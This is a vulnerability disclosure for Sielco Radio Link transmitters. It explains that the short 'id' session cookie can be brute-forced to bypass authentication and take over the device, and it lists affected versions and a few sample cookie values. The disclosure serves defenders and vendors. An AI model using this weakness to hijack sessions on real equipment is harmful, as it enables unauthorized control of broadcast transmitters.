<pre><code><br />Sielco Radio Link 2.06 'id' Cookie Brute Force Session Hijacking<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: 2.06 (RTX19)<br /> 2.05 (RTX19)<br /> 2.00 (EXC19)<br /> 1.60 (RTX19)<br /> 1.59 (RTX19)<br /> 1.55 (EXC19)<br /><br />Summary: Sielco develops and produces radio links for all<br />transmission and reception needs, thanks to innovative units<br />and excellent performances, accompanied by a high reliability<br />and low consumption.<br /><br />Desc: The Cookie session ID 'id' is of an insufficient length and<br />can be exploited by brute force, which may allow a remote attacker<br />to obtain a valid session, bypass authentication and manipulate<br />the transmitter.<br /><br />Tested on: lwIP/2.1.1<br /> Web/2.9.3<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5762<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5762.php<br /><br /><br />26.01.2023<br /><br />--<br /><br /><br /># Session values (len=5)<br /><br />Cookie: id=42331<br />Cookie: id=28903<br />Cookie: id=+5581<br />Cookie: id=+9002<br />...<br />...<br /></code></pre>